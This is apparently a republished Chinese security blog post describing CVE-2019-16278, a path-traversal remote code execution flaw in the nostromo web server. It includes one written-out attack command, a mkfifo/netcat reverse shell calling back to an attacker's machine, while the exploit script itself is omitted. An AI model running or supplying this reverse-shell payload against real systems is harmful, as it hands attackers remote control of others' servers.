基于CVE-2019-16278的漏洞

admin 2023年1月8日18:24:11评论35 views字数 693阅读2分18秒阅读模式

    

    本次仅为学习交流,请遵守《中华人民共和国网络安全法》,勿用于非授权测试,如作他用所承受的法律责任一概与作者无关。

    基于CVE-2019-16278的漏洞


前沿描述

        最近研究了CVE-2019-16278 ,nostromo 服务器1.9.6 版本的远程代码执行,nostromo服务器是一个开源的web服务器,在unix系统中比较流行,通常用于OpenBSD系统。

        Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。在我测试时,Nostromo的所有版本,包括最新的1.9.6版本,都存在漏洞。


    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278


漏洞使用

        我利用了目标机器上的netcat反向连接vps获得目标机器的控制权限

命令如下:

./exp.sh x.x.x.x  xx  ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x  xx >/tmp/f’

        EXP请自行百度(或者谷歌)。


基于CVE-2019-16278的漏洞


 

再次温馨提示:

请勿用于非授权测试

人在做天在看


基于CVE-2019-16278的漏洞




手握日月摘星辰,安全路上永不止步。

                                                      - Khan攻防安全实验室



本文始发于微信公众号(Khan安全攻防实验室):基于CVE-2019-16278的漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月8日18:24:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   基于CVE-2019-16278的漏洞https://cn-sec.com/archives/536505.html

发表评论

匿名网友 填写信息